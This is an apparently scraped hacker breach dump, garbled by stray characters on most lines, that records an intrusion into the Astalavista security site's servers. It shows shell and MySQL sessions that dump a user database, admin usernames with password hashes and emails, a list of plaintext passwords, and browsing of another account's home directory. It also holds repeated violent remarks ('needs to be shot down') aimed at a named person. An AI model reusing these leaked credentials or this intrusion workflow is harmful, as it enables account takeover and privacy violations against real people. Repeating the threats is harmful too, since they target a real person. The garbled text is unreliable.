<channel>5 z% ]) X/ G* w J
<title>ASTALAVISTA.com - Exploits</title>
' n4 M. V8 ~/ c# A <link>http://www.astalavista.com/exploits</link>
6 F c) A6 w( f4 d <description>All availably Exploits.</description>
, [. Q; y% f1 d% N% q <language>en-us</language>
% p: _$ |0 ~: l3 v' [ <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
( ]+ B$ U) Y2 m$ u7 H1 l1 y7 @) [ <docs>http://blogs.law.harvard.edu/tech/rss</docs>
+ t) I/ ~1 D; o$ D! Z1 E <generator>Astalavista.com</generator>' @; C2 x* Y l0 L0 @
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
/ \7 v& I& K4 \! [) l9 | </channel>
5 I7 `& g8 b+ Y: h</rss>’;
2 |; i: I6 A* a$ \" G0 p7 K4 P9 H% `+ v
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
$ L4 h6 F$ x5 I9 Y0 O P: P8 u unlink (FULLPATH . ‘/feed/exploits.xml’);
9 W4 L* O: I) v1 |% T }; W# Y* I s# g" q$ w+ l) o, C% }
: E& j. c. K1 t1 \
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);+ f* x1 S, L/ I, t' K9 ^# @. B
[snip]. O. D/ [% l% F
; w# \ j3 c: G3 _1 h1 a' F8 x
sh-3.2$ cat exploits.sh. n+ Y: ^) L0 X& x2 i5 R
#!/bin/sh& q. W* x3 r8 I6 O5 @; |: x- G
7 S" \! w- |+ ?& e, G! X" r
###########################################################9 \, e, J' G8 n( [4 ~( i0 J
# #/ r1 v: J3 H* l9 k
# Title: milw0rm exploits adder #8 v7 C( u4 x& d) E+ S5 c
# Description: Add all milw0rm exploits to the #
% D4 f' {+ G1 Y# V# d6 P# Astalavista.com database #
* U* T' H+ ?2 u# #
$ D0 X% O% X1 m# Company: Astalavista Group #
( F2 @" s; y ]; |0 c# Author: Paulo M. Santos #! t1 D* a" {2 }6 Q1 X9 h1 @
# E-Mail: 链接标记paulo.santos@astalavista.ch #
1 i- M4 A D$ \5 M# #
, Z/ @; }2 @8 R% e+ }###########################################################* |% R8 w6 I( `. t: `% a; s
) e/ h- _; I8 ]2 @" m9 z# path
% z) r$ T/ ]2 n% m6 U4 d1 S* G: Zthis_path=/home/com/public_html/modifications/cronjobs
7 z7 m1 g# C, y( m) V! { U2 ^. K! g
# change directory( v' y! n/ @) C1 {5 d
cd $this_path
* _, | p- w2 e7 \7 bcd tmp/* H1 V2 q4 f' B( n" a
2 w8 t; Y5 X% Z( T$ L+ M3 {( \5 P
# delete files
2 P/ e; p( l3 V6 z V- o( Frm -rf milw0rm.tar.* && w) ?! D6 k1 u
rm -rf milw0rm/ &
, f& v O1 Q+ b) W, S- x. t8 H; E, U! t" P4 e
# wget milw0rm paket$ N- J! h8 b3 D8 l7 _
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]7 ^ c$ ~& ^3 Y6 S
. D3 F$ w; x' A9 _
# extract milw0rm paket
; N7 a4 ]. O3 |7 L# c! Z9 Itar -xvf milw0rm.tar.bz2& H6 W* ]. H T1 R- \& I
7 |5 Y0 z- J8 t1 U
# change owner/ g( T1 g% U5 ?, b2 w* z: f
chown -R com .
0 U" }$ J& F X5 P' g2 e, schgrp -R com .
9 q8 K/ N% p* O! r' U# I# M7 d, b; g3 X" D! ~: Y2 n" D" M% J
# execute php script
: u8 `2 a( o! r4 ~cd $this_path; m0 ]" _5 F- ^; O; K8 U
php -q exploits.php
+ o( ^. f6 Z1 a" G/ P/ F5 [& D
' c; f$ t2 O( l# H4 p# delete files; R- A+ P0 g! |# o% T) e7 T; j. j
rm -rf tmp/milw0rm.tar.*
% R- S! A9 S6 _rm -rf tmp/milw0rm/ d; W" u. X$ f' r6 f2 P, v3 k$ ?
2 v/ g h/ E( |+ P) e* }* F; \
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”- g# v$ Y: y' D' r5 U
Paulo M. Santos needs to be shot down.
" G: Z$ u$ u+ M; K
& F" f/ ?3 H4 a. Z/ o8 pmysql -u contrexxuser2 -p
5 i. D3 Y4 j6 r! T. @2 y- dEnter password:
( `: R) g: @& ?2 {' A9 ~/ |$ vWelcome to the MySQL monitor. Commands end with ; or \g.
3 [: I5 o$ u1 T3 XYour MySQL connection id is 261694
$ s) R6 m4 `6 B! J1 {* r9 ?Server version: 5.0.45-community-log MySQL Community Edition (GPL)- s& t7 B2 r, d0 |) {* ^
8 h$ I+ H, M, u: w
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
) u5 ~4 i" {' G: J0 ?6 O' f- W' r5 W( Y1 _
mysql> show databases;- E- V/ n% D' }' h. _: E
+——————–+
/ P- }- I3 F* K6 t1 J; C1 R2 d| Database |- V8 I3 g. ]* l
+——————–+& i: C2 J% C" z" G! ^" \# Z! G1 E+ B
| information_schema |
) O9 g2 }1 J- [* u/ C) P* d! T/ Z N| com_contrexx2 |
0 n& O- q9 @% {2 v4 X! {& a| com_contrexx2_live |
7 k7 [, p) E+ ]8 W) D7 m$ ?| test |
! X5 e8 o, M9 I' m! G; j' s& }+——————–+
1 i5 s/ l9 d: ?) m# P4 rows in set (0.00 sec)) d# z' R" _7 [6 |2 O1 L
# U2 ]6 M; `. B+ C
mysql> use com_contrexx2_live
2 t) a2 ^. i. e+ wDatabase changed
' k5 M$ }4 C7 g8 omysql> show tables;
4 M# @8 ]5 C) ]% t# q+————————————————–+
; R2 A( C! U5 i% b| Tables_in_com_contrexx2_live |+ N0 W# a, R6 B+ i$ [% R
+————————————————–+: D4 j9 l; x8 H
| cc_banner_counter |
" L7 r k4 d$ ^+ f0 j% ]3 [| cc_search_counter |
* j" ^ t M2 l& F. W' D| contrexx_access_group_dynamic_ids |
* x: H* K4 d, V1 Y| contrexx_access_group_static_ids |
) y' J, m$ |2 Y# u: y# X| contrexx_access_rel_user_group |2 [6 g, s0 O: j( d4 p
| contrexx_access_settings |0 o! c1 _% S+ Q5 T9 b9 _
| contrexx_access_user_attribute |
6 g" _% K4 H* {% y, s$ @" J| contrexx_access_user_attribute_name |4 a$ e% ^% q9 {1 Q# ~+ i1 P
| contrexx_access_user_attribute_value |
9 M, D- m: w) g4 m# Y| contrexx_access_user_core_attribute |8 Z/ j% `/ R A, i, \0 P: T
| contrexx_access_user_groups |. g( p {. t0 s, X! u- p7 ^
| contrexx_access_user_mail |
# i: k* g# l; `) c7 D; ]/ \| contrexx_access_user_profile |2 F8 n) X8 g/ E
| contrexx_access_user_title |
6 p. m$ T+ g. p' c" M% d) v| contrexx_access_user_validity |
$ N9 Z! I7 k" ]2 s; K! |3 B| contrexx_access_users |5 h% Y/ `# \6 ~' c% h' h# a) Y8 `
| contrexx_backend_areas |+ [- t1 q- t' r& \- A
| contrexx_backups |* l) f% p2 ]! K; ?9 J
| contrexx_content |
* r+ R2 \1 ?, j( H" W. W| contrexx_content_history |
+ q* v1 m4 R: I5 W V( ?| contrexx_content_logfile |
& ~: Z" I- s) @3 _* i8 p| contrexx_content_navigation |
% \) u- O! f3 I4 r) ]| contrexx_content_navigation_history |
" W( E. O8 \' [: O8 B5 B- k| contrexx_ids |! u: j, N t# A: L5 i- n. e8 \
| contrexx_languages |$ L1 {- l/ l+ ~1 {$ O% r; P$ D
| contrexx_lib_country |
6 b5 ]$ Q; P* A/ X8 I| contrexx_log |6 r* h$ Z' Y" i
| contrexx_module_alias_source |
) J+ `; b8 W7 O- u1 g+ n| contrexx_module_alias_target |
2 G; s/ @: w8 b; D1 K$ K8 ]/ |6 G3 G| contrexx_module_block_blocks |5 Y2 g6 y" K( x' v( m5 j
| contrexx_module_block_rel_lang |
9 ?- d$ x1 q$ S+ ~, q) L/ [| contrexx_module_block_rel_pages |1 k. u2 j4 z6 i% D- d- |
| contrexx_module_block_settings |6 C3 ]5 b8 {. n% X1 R9 ?2 V
| contrexx_module_blog_categories |* \7 K6 j+ r0 x+ G) R6 \9 [
| contrexx_module_blog_comments |
7 H- R2 M( i, p- L| contrexx_module_blog_message_to_category |
4 B2 c; P4 e9 x: C; q" T: G| contrexx_module_blog_messages |
% _$ Y; G. c' e% m) f/ ~| contrexx_module_blog_messages_lang |: Q2 r& N! E' }& h/ {" ~$ w: h
| contrexx_module_blog_networks |% d1 k' p- O0 X% {* P$ c. v
| contrexx_module_blog_networks_lang |( R F" ` ^8 ` i
| contrexx_module_blog_settings |
! T3 E6 f, e# j7 g2 O6 w| contrexx_module_blog_votes |
7 Q q, n. z4 E6 b| contrexx_module_calendar |! B# R/ N1 c1 I
| contrexx_module_calendar_access |
0 {7 c' Y6 F% o| contrexx_module_calendar_categories |
" `% }. c5 L" j$ T| contrexx_module_calendar_form_data |0 r! b9 l" {) U# B
| contrexx_module_calendar_form_fields |
" G" e+ Y# ^ j# e& {& ?4 i1 j| contrexx_module_calendar_registrations |2 x! B3 \6 V: C% Y
| contrexx_module_calendar_settings |" {# t' \+ C6 K e
| contrexx_module_calendar_style |% q* ~! X3 }. J) a4 k1 z
| contrexx_module_contact_form |/ Z* T( C. B4 N5 y4 E
| contrexx_module_contact_form_data |
' O/ n+ U1 d7 }5 V! _1 {| contrexx_module_contact_form_field |
, s' i6 P3 z7 t7 W& D- j' F| contrexx_module_contact_settings |3 t& s9 N% v5 ^! c+ N/ T0 x
| contrexx_module_data_categories |
) w7 u; W) I& Y6 R: a( h6 @| contrexx_module_data_message_to_category |4 y7 I" ~0 ?) Y. n, h
| contrexx_module_data_messages |
8 L4 Z) L1 s# L) o4 O1 t| contrexx_module_data_messages_lang |
6 ]% }( I5 R8 R. `9 t5 o3 J% j| contrexx_module_data_placeholders |3 {2 L& K! \, s' D' F
| contrexx_module_data_settings |' ?8 n! n+ x! M! Q( O
| contrexx_module_directory_access |* `8 V e" N" f2 r1 Z
| contrexx_module_directory_categories |
! c7 Q: M# n1 u- E| contrexx_module_directory_dir |8 f$ d4 o( Z) K; Q# n
| contrexx_module_directory_inputfields |
4 @) q4 Q3 g3 H| contrexx_module_directory_levels |% R4 d$ S% x$ i6 m9 H0 |6 ~1 H& J
| contrexx_module_directory_mail |
8 d& G6 |& b9 |5 m o& Z1 C| contrexx_module_directory_rel_dir_cat |$ {* B+ D5 d6 E# j k& B6 J; T
| contrexx_module_directory_rel_dir_level |$ |9 _* |: u5 r( s" T6 B1 k
| contrexx_module_directory_settings |
1 e8 e- }7 c5 g5 O _" A| contrexx_module_directory_settings_google | D$ C2 F. \$ V8 S( ?. l; p
| contrexx_module_directory_vote |) p$ J+ q& Y: i( m4 _, C( W
| contrexx_module_docsys |
' K) ^) s! T5 K+ }. Z| contrexx_module_docsys_categories |0 m4 B0 x# f7 u
| contrexx_module_egov_configuration |7 [3 x) I9 V+ a |
| contrexx_module_egov_orders |
9 N0 b% e* d. R' x6 _) q| contrexx_module_egov_product_calendar |
2 a8 R7 _1 j9 \$ S: y# V0 \| contrexx_module_egov_product_fields |: @$ Y. K$ |3 A7 L
| contrexx_module_egov_products |
$ O+ u+ p& L( Y! i2 _| contrexx_module_egov_settings |: H9 i" _# @/ b; b4 A
| contrexx_module_exploits |9 P, Y7 \( _, r$ z0 }
| contrexx_module_exploits_categories |6 h; i/ R/ j0 q5 p! w4 G
| contrexx_module_feed_category |& N& P- O$ V _
| contrexx_module_feed_news |2 Y4 _; r2 m. c5 Q- q6 v6 g
| contrexx_module_feed_newsml_association |
" a( g: F, m/ b& e| contrexx_module_feed_newsml_categories |3 W0 P/ P: n: Y/ ]
| contrexx_module_feed_newsml_documents |& u% a# u4 e0 m! k
| contrexx_module_feed_newsml_providers |
. o+ }7 h, i4 \$ h- j" x1 u| contrexx_module_forum_access |
* ^/ z, w( p7 W7 L* z: x| contrexx_module_forum_categories |
+ r5 M) P# D! n1 R) a3 X/ p- n| contrexx_module_forum_categories_lang |4 J5 B" U: V. ?. p8 ]
| contrexx_module_forum_notification |# c8 S+ R- G$ m8 i
| contrexx_module_forum_postings |
- ?0 [7 C+ `# n. r5 h, w| contrexx_module_forum_rating |
. P$ k! Q& j5 P! A3 P| contrexx_module_forum_settings |
+ w% k9 ^/ F9 f: z0 u" v9 a P| contrexx_module_forum_statistics |
8 E* a. D- w- W' r4 ?| contrexx_module_gallery_categories |1 e6 e8 @+ o9 l* x
| contrexx_module_gallery_comments |/ D5 H4 a3 N h, I' u, E* N" r" E
| contrexx_module_gallery_language |. `& G% v- }$ U j5 I
| contrexx_module_gallery_language_pics |2 \$ x1 U, q* W: d
| contrexx_module_gallery_pictures |% ?$ J" y: @7 f8 b& r# C7 n6 z
| contrexx_module_gallery_settings |. x+ h0 H0 ?2 G! w6 _- |
| contrexx_module_gallery_votes |% @0 _% [7 D9 I) c" o# d. o! b0 f' f
| contrexx_module_guestbook |
$ e( D0 R4 E" j1 Y7 X| contrexx_module_guestbook_settings |; y5 N: L; C; S! \" | i
| contrexx_module_livecam |
4 J0 a, j N* t# s: @| contrexx_module_livecam_settings |
) ~; q4 L$ w l+ G2 z| contrexx_module_market |
0 T0 t3 f6 H& L* g* w1 V* ~* g! y| contrexx_module_market_access |
6 y& F8 J+ Z6 i| contrexx_module_market_categories |' J4 r9 o5 `4 E* w
| contrexx_module_market_mail |
+ C; b# t' H6 K9 |, s| contrexx_module_market_paypal |
6 ^) ], @! e4 _. I# V$ c| contrexx_module_market_settings |
0 `$ O4 H& H/ i+ g0 i/ U| contrexx_module_market_spez_fields |/ E. M1 U y& K& @% U* T3 r
| contrexx_module_mediadir_access |
( T& J( S% e4 ]0 m Y {5 c| contrexx_module_mediadir_categories |1 Q& g! S+ X. s: D0 {: J A$ R
| contrexx_module_mediadir_comments |3 y; v, g, P" L, r# d
| contrexx_module_mediadir_dir |! M9 p2 Z' h) m% [, t' ]
| contrexx_module_mediadir_inputfields |- c; K, m8 Z0 B: A* E
| contrexx_module_mediadir_levels |# ]1 }& y; q, ?4 H9 |4 e
| contrexx_module_mediadir_mail |
" {. ~. I- J& t3 \# i2 R| contrexx_module_mediadir_rel_dir_cat |
* {- j/ U/ m: j9 s- p2 b/ I3 _| contrexx_module_mediadir_rel_dir_level |8 D+ v2 v& b) O6 U
| contrexx_module_mediadir_reports |5 ~4 ^& Y6 V$ N: q6 p: p5 e
| contrexx_module_mediadir_settings |7 B' `) f0 n' T" e) ?5 t
| contrexx_module_mediadir_settings_google |
0 v' e" x1 ]" @% }( a( c| contrexx_module_mediadir_vote |
" }+ g: p. t5 F! { b2 l! h| contrexx_module_memberdir_directories |; v, u( m0 t& W" {. {3 j; q
| contrexx_module_memberdir_name |0 o! q7 \: a- |' t4 ?6 H1 o
| contrexx_module_memberdir_settings |- v8 ^9 u% I. b; z
| contrexx_module_memberdir_values |# W4 n$ O2 b2 p4 P# c
| contrexx_module_nettools_allowed_groups |
4 s0 N# F. }8 J% p8 g4 X% C+ U| contrexx_module_nettools_settings |
b5 E( J( B& b! [% V| contrexx_module_news |
% l$ y9 B+ b# p- r. R| contrexx_module_news_access |' q9 Y9 B' n0 I1 r. h
| contrexx_module_news_categories |
) F/ M7 U t3 K! Q| contrexx_module_news_settings |1 a S+ P; Z! D( x. j3 p9 H
| contrexx_module_news_teaser_frame |
! y, ?6 J4 D) b# v7 `7 d- W- e| contrexx_module_news_teaser_frame_templates |
/ X" G/ K/ k& U. L- W5 d" r: U| contrexx_module_news_ticker |
; ?6 G- @3 P! I8 A D- {| contrexx_module_newsletter |) f% s( J7 T! i7 {3 W, M
| contrexx_module_newsletter_attachment |
+ p4 Y6 b6 [3 H$ r! g, O| contrexx_module_newsletter_category |# W+ n5 x! J5 x- ^& f: {
| contrexx_module_newsletter_confirm_mail |2 y& S8 i: f1 V
| contrexx_module_newsletter_rel_cat_news | U/ K% o' D' {: {
| contrexx_module_newsletter_rel_user_cat |
. n( |; Z3 r" e! Z| contrexx_module_newsletter_settings |
7 H% X! k& G7 P# O| contrexx_module_newsletter_template |7 S" f( b' m% v2 H. K
| contrexx_module_newsletter_tmp_sending |1 X: H7 n- I; g+ t! t
| contrexx_module_newsletter_user |
' E. @2 h" m' E# X| contrexx_module_newsletter_user_title |. Q1 W8 R } [% }" g# F
| contrexx_module_onlinetools_defaultports |
$ ^9 L# b8 c* Q( b& x6 A| contrexx_module_onlinetools_defaultports_back |
# h, J/ M; T- W/ r y| contrexx_module_onlinetools_geolitecity_blocks |7 N+ E8 N' F8 a1 n! s
| contrexx_module_onlinetools_geolitecity_country |
" E5 H' q3 ]2 F' s| contrexx_module_onlinetools_geolitecity_location |5 c- p' t6 L6 N
| contrexx_module_podcast_category |" e' T7 |2 Z9 r" x$ w; X
| contrexx_module_podcast_medium |
' I! Z) a5 v( n| contrexx_module_podcast_rel_category_lang |
' |: e6 A! M7 \- w3 p) h+ {, r| contrexx_module_podcast_rel_medium_category |
' E% ~; j& z6 x2 M @| contrexx_module_podcast_settings |4 p# Z* |& w+ ~
| contrexx_module_podcast_template |+ e/ w \) s- h& Z
| contrexx_module_proxydb |8 d+ s" A) A! y. n, Q' C
| contrexx_module_recommend |
5 F; j. ?) e5 v2 j2 V# e| contrexx_module_repository |
" ]: K( p1 W8 h/ @& @| contrexx_module_securitynews_cats |
# ~' r9 |! o/ l7 ]& M7 [| contrexx_module_securitynews_feeds |* P M; f6 b f* ` W `0 G/ b
| contrexx_module_securitynews_news |% O' V S, X! V" X8 Y8 j# `) a
| contrexx_module_shop_categories |% A7 j8 D$ _; j% p) b& C
| contrexx_module_shop_config |
+ H1 m+ A2 J+ ~| contrexx_module_shop_countries |
( n' g# i, M$ Q| contrexx_module_shop_currencies |8 ~: Z/ I; u- v; d; C
| contrexx_module_shop_customers |
" g! E2 n6 [& |% P+ Y( d* X) n| contrexx_module_shop_importimg |7 U3 f8 v& o+ l9 I7 J
| contrexx_module_shop_lsv |
8 J6 @$ {( k& q| contrexx_module_shop_mail |
+ E$ B! o' t: j' C# v| contrexx_module_shop_mail_content |3 W$ x3 I [4 C6 J; b
| contrexx_module_shop_manufacturer |7 ^, \6 ~- \! S" K7 B
| contrexx_module_shop_order_items |
) O; a3 f& n- T% T( e| contrexx_module_shop_order_items_attributes |
8 S" w* W3 M! g% y4 S$ Y ~ B' O| contrexx_module_shop_orders |
. f3 I4 E5 z# V5 f/ p$ K| contrexx_module_shop_payment |
, G$ S+ [4 f- H" c% ]| contrexx_module_shop_payment_processors |
l0 E/ p* Y; Y, U, t1 T| contrexx_module_shop_pricelists |
$ r/ j; K6 i! ?. ?( \/ Q& `" ?| contrexx_module_shop_products |
% ^4 c x/ C4 A1 {! s| contrexx_module_shop_products_attributes |
1 @) O5 z# ]* F+ G| contrexx_module_shop_products_attributes_name |/ v( t# S z! ?* Q8 q1 F
| contrexx_module_shop_products_attributes_value |
& b# s4 \" ]1 W8 C" {6 @| contrexx_module_shop_products_downloads |
2 B F. y% C# P3 p| contrexx_module_shop_rel_countries |
) b( X: Y7 p& e& O" g| contrexx_module_shop_rel_payment |
7 l/ ~5 V- r- R" d| contrexx_module_shop_rel_shipment |" {0 r6 q6 q$ s
| contrexx_module_shop_shipment_cost |3 o8 V7 @9 B% z! p
| contrexx_module_shop_shipper |; ^: w5 e4 j. i; B U
| contrexx_module_shop_vat |$ K3 t" l6 F% l# n5 f# g5 Z" R( W5 r
| contrexx_module_shop_zones |
: n- y. t7 z" \+ r, m) K; `2 e| contrexx_module_u2u_address_list |2 `. w% i, V$ j9 A
| contrexx_module_u2u_message_log |
" y3 K/ P! T5 `: Y% T0 e| contrexx_module_u2u_sent_messages | Q/ c& l0 s1 w8 _" F3 m
| contrexx_module_u2u_settings |1 ~+ B# v6 y( I
| contrexx_module_u2u_user_log |
5 R& N. b' }) T5 t| contrexx_modules |
! Q2 `( F2 a$ X2 V2 p| contrexx_sessions |
: J) Z, m6 d5 q) C u4 Y! u) e: v| contrexx_settings |
8 ]. O K8 @3 \3 m1 a| contrexx_settings_smtp |$ ^3 L- c. U1 m: q
| contrexx_skins |, {! R% H$ O% r1 V! L& m, U! t
| contrexx_stats_browser |
; r" ~* M( y9 Y" W4 `| contrexx_stats_colourdepth | P$ ^$ ~" d4 z- o1 T
| contrexx_stats_config |
- j* B, _1 n, b4 V/ o2 `| contrexx_stats_country |
8 X3 ] F+ C, P: ]( ^| contrexx_stats_hostname |
" R0 U v `" Q( q* y5 ?+ Q| contrexx_stats_javascript |
( A7 b; G% |: V" I2 D| contrexx_stats_operatingsystem |' I* X i3 e3 @. y1 x
| contrexx_stats_referer |% P+ b* r6 |/ t% X$ K9 D* k
| contrexx_stats_requests |9 }" x' P, L' h$ u
| contrexx_stats_requests_summary |
# J8 k; L6 O+ O( Q9 _8 A5 d| contrexx_stats_screenresolution |
/ F- w$ F# r- g) O; u9 w6 G| contrexx_stats_search |
+ |7 Q' O+ ~' N$ T3 F6 P5 g| contrexx_stats_spiders |
; Q# m6 Q! `, o7 W8 ^| contrexx_stats_spiders_summary |
2 V/ B& H e9 Q- C| contrexx_stats_visitors |
( u9 N8 M, m/ V: K) O0 O$ W| contrexx_stats_visitors_summary |
- b8 [8 {) b# g6 s/ X [| contrexx_voting_additionaldata |( x( [8 A, E8 t) I. @' P! {
| contrexx_voting_email |0 s' W. e9 R3 j+ D) ?$ B
| contrexx_voting_rel_email_system |, H( ^9 S9 F9 }6 w
| contrexx_voting_results |4 M$ `. z1 H; E$ l; m% e- A0 R
| contrexx_voting_system |/ [ b' N) m! T' N! q
| foo |
. i- J1 C# V$ H# I9 C/ A+————————————————–+. x. @4 `$ S" d+ ^0 \
227 rows in set (0.01 sec)
! n' T, ]6 R* P9 E$ f' z( y6 K
- ?, C9 X1 ]$ |' `3 G& Nmysql> select count(*) as skids from contrexx_access_users;
. w( R$ C& _+ Q/ O/ ^) W* U% r+——-+
7 f: |4 G$ {2 {. I: A$ Z" || skids |0 i2 [* S1 G" r$ I# ?
+——-+) N/ [ [2 E+ M! D* C
| 53699 | N6 X7 {' F8 V: H9 s/ v$ K
+——-+" [. L0 B" ]! C0 b& H
1 row in set (0.00 sec)
% C6 A) y1 M) b: Y- o; O
$ i1 m# J9 F0 J/ E Emysql> describe contrexx_access_users;
8 w& V7 z% Y7 I# n% a0 F0 ^4 C+——————+——————————————+——+—–+————–+—————-+7 V" V+ R# W- H/ g! h9 T s3 ` ?
| Field | Type | Null | Key | Default | Extra |9 z4 `+ z5 X; S' ^. \
+——————+——————————————+——+—–+————–+—————-+
7 ~ g% a0 `( d4 n9 \7 R| id | int(10) unsigned | NO | PRI | NULL | auto_increment |" Q" `) J3 }+ R, K7 k
| is_admin | tinyint(1) unsigned | NO | | 0 | |, a) D5 ]( k, `, L
| username | varchar(40) | YES | MUL | NULL | |7 k/ _; ^6 m- p
| password | varchar(32) | YES | | NULL | |) E5 e! ]! g* `% k0 c$ Y
| regdate | int(14) unsigned | NO | | 0 | |3 @! ^. j: s ^
| expiration | int(14) unsigned | NO | | 0 | |" L/ l7 z2 E" t2 C# F3 @4 [% k
| validity | int(10) unsigned | NO | | 0 | |
: E0 Y9 _6 H' n| last_auth | int(14) unsigned | NO | | 0 | |8 w: _/ O5 ^/ Z, U
| last_activity | int(14) unsigned | NO | | 0 | |) m+ b3 }5 P3 L. i& u, M
| email | varchar(255) | YES | | NULL | |" h& O, F* O( Z* h* j
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
. P5 p; w$ z# v| frontend_lang_id | int(2) unsigned | NO | | 0 | |
1 B b* l* X& y| backend_lang_id | int(2) unsigned | NO | | 0 | |- g2 d9 h8 p* N2 a& {
| active | tinyint(1) | NO | | 0 | |4 K% ~$ ~; j# S7 P! F
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
; J$ ?+ L& C! q( I| restore_key | varchar(32) | NO | | | |4 m+ `2 I+ f( ]+ e( m: x+ ]/ s+ g
| restore_key_time | int(14) unsigned | NO | | 0 | |9 C' s9 k, {# U) q8 w
| u2u_active | enum(’0′,’1′) | NO | | 1 | |2 f3 |4 g* q2 V+ s4 i
+——————+——————————————+——+—–+————–+—————-+3 W6 B9 o! b% O- N
18 rows in set (0.00 sec)& [; ?2 [1 c( L0 O6 j! w+ ?
/ F- ^$ [9 Z' N( Q; I
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
: R# t+ Y( f% Z' S+————+———————————-+—————————–+
- d: C2 C! M; g& t| username | password | email |* A/ \" Z" g$ E8 g. I
+————+———————————-+—————————–+ f# ]5 \ o& L+ M
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |: \5 y' l1 f. T
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |, y6 V% n& Q. _$ Z# `
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |. [% n. \9 p# j* K2 o" L% R! ?8 S% ^
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |! |$ ^8 F8 ]1 P' b
+————+———————————-+—————————–+- \ ]/ V4 h) @8 D- I
4 rows in set (0.04 sec)6 b# }4 O% x7 f: D9 `
& n$ q+ t; a; s/ kmysql> exit;* }4 F4 e4 z" C7 I
Bye4 {' s; V; ~9 E$ ~& j# g- a
! ~9 ?: k4 s# v- X8 i- f9 ?) h& I[~] There you go, your “team of security and IT professionals” is a joke.
3 H1 z( ?3 W5 o d3 R" {6 j6 k, L4 }! T& K( c P* [$ P. T% B
+——————————+
* ]7 G; L t! s3 Jsystem:f82BN3+_*# t5 F# D, r. D8 ^5 }
Be1er0ph0r:belerophor4astacom7 u& `3 p" N8 u' e+ t. {* C
prozac:asta4cms!# a2 F( F! }" v H) T2 ]
commander:mpbdaagf6m, N& |6 t- @# g! {% D+ [
sykadul:ak29eral9 Z) i: |$ D( G* ]
+——————————+
5 d% Y& e4 _. u- R0 I5 k( v' y
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)! O' M3 U! ^$ i6 J, e4 z
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.) i" d; |4 F. y# n* d& H
0 x/ ^2 i( C K[~] Lets move to astalavista.net now,
: @# ?8 _9 L' ~% p3 ?9 `) `! o {( e7 _; m0 S$ j+ u1 G' w8 r e
From <链接标记[url]https://www.astalavista.net/[/url]>:
5 H2 J# v" z5 B! n0 q2 T) @>> Everyone knows that the best defense is a good offense.
8 r& k" ~; [, m% Y8 q>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
/ C! L! S+ q+ W0 R9 b! [' i8 U>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.# _5 G' F2 F4 S8 N; a
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”- e4 Z+ M' {! T
7 g; u4 e# k5 ?( U1 h
>> Go ahead, try and hack our server . in a completely legal way!
: A- C3 c6 _& E) t/ c* V- R>> Learn by doing: We offer our members tricky tasks and challenges on an
9 M: f: `7 v6 i& p3 ^, S* n; L! t>> ongoing basis so you can test your knowledge and abilities. You can also! Q3 W) D! ]' x( e5 }
>> demonstrate what you.ve mastered by taking part in regular hacker contests
' X f4 T: |( y: X0 S1 v3 n; Q>> and war games( T3 q: }& U( A) a
# @3 w# [: N. c$ {+ `0 [
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
7 q& N5 k# `# _" p" x: D O% T5 g3 g7 ^6 I/ b J
[-] Tricky task: Find home dir of astalavista.net
) ?4 R# E# t( }& n( z; ]; ]9 [; b/ f4 q( G
sh-3.2$ ls -la ~astanet
" h" {2 {2 L, `9 [total 48
3 G, q( o8 x$ C* tdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
+ y8 K A9 `1 O/ k# N' J( F: ~- Hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 t+ H( n5 K& @" y' Sdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth9 f6 r; ]" A$ Y
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history- Y3 K9 ~% G9 ~, P
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout& Q# Y9 F5 ]9 D5 T5 p
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile* b& B, F) s7 L' n" }
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
h# k1 z1 e& s9 j9 `, ]drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains- a/ h+ S- y; B4 r; F/ q7 t
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap$ H: U& T3 z; x6 H9 L
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
8 Q* F$ q) Q# O( z E Klrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html0 i9 J) x1 N. p( V- i. {5 y i) U, u& |
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow4 G% F5 \7 K& f/ k: M
; W6 _4 y% _: U0 I
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
' K* U0 A: z/ @1 O) G( d6 Ksh-3.2$ ls -la/ _0 L: ]$ p. J
total 200
# x2 ]( b! y( w! b5 _$ r- ?drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .0 e' U! t4 J1 m7 e& y6 v6 ?. }
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..0 f/ P* l- {6 s4 O
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0077 U; x! v! c8 t* R
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
3 U6 p6 N8 P4 Vdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com7 v# U) N- h V1 x. v% p& H
